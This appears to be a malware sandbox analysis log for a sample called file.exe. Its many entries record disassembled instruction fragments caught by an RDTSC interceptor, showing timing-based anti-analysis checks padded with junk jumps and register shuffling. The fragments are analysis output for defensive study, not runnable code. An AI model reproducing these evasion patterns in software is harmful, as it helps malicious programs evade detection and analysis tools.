                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F02AC second address: 55F0347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7B61CD0Eh 0x00000008 pushfd 0x00000009 jmp 00007FFAC168445Fh 0x0000000e jmp 00007FFAC1684463h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FFAC1684464h 0x0000001f add esi, 3471DEB8h 0x00000025 jmp 00007FFAC168445Bh 0x0000002a popfd 0x0000002b mov ebx, ecx 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007FFAC1684465h 0x00000034 xchg eax, edi 0x00000035 jmp 00007FFAC168445Eh 0x0000003a test esi, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FFAC1684467h 0x00000043 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0347 second address: 55F035F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB474h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F035F second address: 55F040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFB32FC26FBh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FFAC1684464h 0x00000018 add cl, 00000038h 0x0000001b jmp 00007FFAC168445Bh 0x00000020 popfd 0x00000021 call 00007FFAC1684468h 0x00000026 pushfd 0x00000027 jmp 00007FFAC1684462h 0x0000002c sbb cx, 21C8h 0x00000031 jmp 00007FFAC168445Bh 0x00000036 popfd 0x00000037 pop ecx 0x00000038 popad 0x00000039 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000040 pushad 0x00000041 movsx edx, ax 0x00000044 mov ebx, eax 0x00000046 popad 0x00000047 je 00007FFB32FC269Ah 0x0000004d jmp 00007FFAC1684468h 0x00000052 mov edx, dword ptr [esi+44h] 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F040E second address: 55F0412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0412 second address: 55F0418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0418 second address: 55F0461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 pushfd 0x00000006 jmp 00007FFAC0BDB46Eh 0x0000000b xor al, FFFFFFB8h 0x0000000e jmp 00007FFAC0BDB46Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 or edx, dword ptr [ebp+0Ch] 0x0000001a jmp 00007FFAC0BDB476h 0x0000001f test edx, 61000000h 0x00000025 pushad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0461 second address: 55F0484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov ax, 27CFh 0x00000009 popad 0x0000000a jne 00007FFB32FC2673h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAC1684461h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0484 second address: 55F04AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFAC0BDB46Dh 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0797 second address: 55E079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E079D second address: 55E0827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov eax, 5F3349CBh 0x00000012 jmp 00007FFAC0BDB470h 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push edi 0x0000001b call 00007FFAC0BDB46Ch 0x00000020 pop ecx 0x00000021 pop ebx 0x00000022 jmp 00007FFAC0BDB470h 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov di, si 0x0000002d movzx eax, bx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FFAC0BDB475h 0x00000038 and esp, FFFFFFF8h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FFAC0BDB478h 0x00000044 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0827 second address: 55E0836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0836 second address: 55E0863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAC0BDB46Dh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0863 second address: 55E0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0869 second address: 55E086D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E086D second address: 55E0871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0871 second address: 55E092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 731Bh 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FFAC0BDB46Dh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFAC0BDB46Ch 0x0000001d sub ah, 00000018h 0x00000020 jmp 00007FFAC0BDB46Bh 0x00000025 popfd 0x00000026 mov di, cx 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FFAC0BDB46Bh 0x00000032 xor eax, 14EB43DEh 0x00000038 jmp 00007FFAC0BDB479h 0x0000003d popfd 0x0000003e movzx ecx, di 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 jmp 00007FFAC0BDB473h 0x00000048 mov esi, dword ptr [ebp+08h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007FFAC0BDB46Bh 0x00000054 adc ax, FE9Eh 0x00000059 jmp 00007FFAC0BDB479h 0x0000005e popfd 0x0000005f mov bx, cx 0x00000062 popad 0x00000063 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E092B second address: 55E098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FFAC1684467h 0x00000010 test esi, esi 0x00000012 jmp 00007FFAC1684466h 0x00000017 je 00007FFB32FC9E77h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFAC1684467h 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E098C second address: 55E0A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 mov ecx, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FFAC0BDB470h 0x0000001e xor ax, 3A18h 0x00000023 jmp 00007FFAC0BDB46Bh 0x00000028 popfd 0x00000029 mov edi, ecx 0x0000002b popad 0x0000002c je 00007FFB32520E2Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FFAC0BDB477h 0x0000003b add cl, FFFFFF8Eh 0x0000003e jmp 00007FFAC0BDB479h 0x00000043 popfd 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A1E second address: 55E0A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A33 second address: 55E0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A37 second address: 55E0A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A3D second address: 55E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, DC95h 0x00000007 jmp 00007FFAC0BDB472h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FFB32520DC3h 0x00000015 pushad 0x00000016 mov ebx, esi 0x00000018 mov ax, BAB9h 0x0000001c popad 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 pushad 0x00000021 push eax 0x00000022 pushfd 0x00000023 jmp 00007FFAC0BDB471h 0x00000028 sbb ax, 0A86h 0x0000002d jmp 00007FFAC0BDB471h 0x00000032 popfd 0x00000033 pop esi 0x00000034 jmp 00007FFAC0BDB471h 0x00000039 popad 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c mov edx, eax 0x0000003e push eax 0x0000003f push edx 0x00000040 call 00007FFAC0BDB476h 0x00000045 pop ecx 0x00000046 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AC5 second address: 55E0AD3 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ADh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AD3 second address: 55E0AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AD7 second address: 55E0AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684462h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0AED second address: 55E0B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAC0BDB471h 0x00000009 add ax, A556h 0x0000000e jmp 00007FFAC0BDB471h 0x00000013 popfd 0x00000014 mov di, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B26 second address: 55E0B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B2A second address: 55E0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B2E second address: 55E0B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B34 second address: 55E0B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B3A second address: 55E0B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684468h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAC1684467h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0B72 second address: 55E0B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0C3B second address: 55F0C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FFAC1684464h 0x00000011 adc cl, 00000028h 0x00000014 jmp 00007FFAC168445Bh 0x00000019 popfd 0x0000001a mov ecx, 55114E1Fh 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, 7E30A7EDh 0x00000029 popad 0x0000002a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0C84 second address: 55F0C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB472h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0C9A second address: 55F0CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007FFAC1684464h 0x00000012 mov ax, E771h 0x00000016 pop ecx 0x00000017 mov esi, ebx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0CD1 second address: 55F0CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0CD5 second address: 55F0CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0CD9 second address: 55F0CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A60 second address: 55F0A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFAC1684462h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FFAC1684461h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A96 second address: 55F0A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A9F second address: 55F0AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56707F3 second address: 5670843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAC0BDB46Ch 0x00000012 xor ch, FFFFFF98h 0x00000015 jmp 00007FFAC0BDB46Bh 0x0000001a popfd 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FFAC0BDB46Eh 0x00000026 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670843 second address: 5670855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC168445Eh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660758 second address: 566075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566075E second address: 5660796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAC1684462h 0x00000008 pop esi 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAC1684469h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660796 second address: 56607E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FFAC0BDB46Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov bl, ah 0x00000016 mov edx, 47FAA9CEh 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov al, F9h 0x00000022 jmp 00007FFAC0BDB473h 0x00000027 popad 0x00000028 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660B79 second address: 5660B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660B7F second address: 5660B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660B83 second address: 5660C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FFAC1684460h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 movzx eax, bx 0x00000017 mov di, B2EEh 0x0000001b popad 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FFAC168445Bh 0x00000026 adc cl, FFFFFF9Eh 0x00000029 jmp 00007FFAC1684469h 0x0000002e popfd 0x0000002f mov esi, 32C58367h 0x00000034 popad 0x00000035 push dword ptr [ebp+08h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b call 00007FFAC168445Fh 0x00000040 pop ecx 0x00000041 mov edx, 13A2CEDCh 0x00000046 popad 0x00000047 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660C02 second address: 5660C38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007FFAC0BDB469h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FFAC0BDB470h 0x00000019 pop ecx 0x0000001a call 00007FFAC0BDB46Bh 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660C38 second address: 5660C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660C3E second address: 5660C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660C42 second address: 5660C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660C46 second address: 5660C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAC0BDB477h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAC0BDB472h 0x0000001b sub eax, 7A3293E8h 0x00000021 jmp 00007FFAC0BDB46Bh 0x00000026 popfd 0x00000027 mov ax, 7FDFh 0x0000002b popad 0x0000002c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660C97 second address: 5660CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FFAC1684461h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660CCD second address: 5660CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660CD1 second address: 5660CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660CD7 second address: 5660CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610390 second address: 56103D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAC168445Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov eax, ebx 0x00000013 jmp 00007FFAC168445Dh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56103D5 second address: 56103D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56103D9 second address: 56103DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56103DD second address: 56103E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56103E3 second address: 5610440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAC1684460h 0x00000009 jmp 00007FFAC1684465h 0x0000000e popfd 0x0000000f mov dx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov cx, 464Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FFAC1684462h 0x00000024 or si, 7AF8h 0x00000029 jmp 00007FFAC168445Bh 0x0000002e popfd 0x0000002f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610440 second address: 5610452 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 368D182Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push FFFFFFFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610452 second address: 5610456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610456 second address: 561046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561046D second address: 5610485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC1684464h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610485 second address: 5610512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 078611D1h 0x00000010 jmp 00007FFAC0BDB46Fh 0x00000015 xor dword ptr [esp], 717FD1C9h 0x0000001c pushad 0x0000001d mov dl, al 0x0000001f pushad 0x00000020 call 00007FFAC0BDB477h 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007FFAC0BDB479h 0x0000002c or ecx, 72F9DE66h 0x00000032 jmp 00007FFAC0BDB471h 0x00000037 popfd 0x00000038 popad 0x00000039 popad 0x0000003a push 4D8F8BCFh 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FFAC0BDB46Ah 0x00000046 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610512 second address: 5610518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610518 second address: 561053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 29612231h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAC0BDB474h 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561053D second address: 5610543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610543 second address: 5610547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
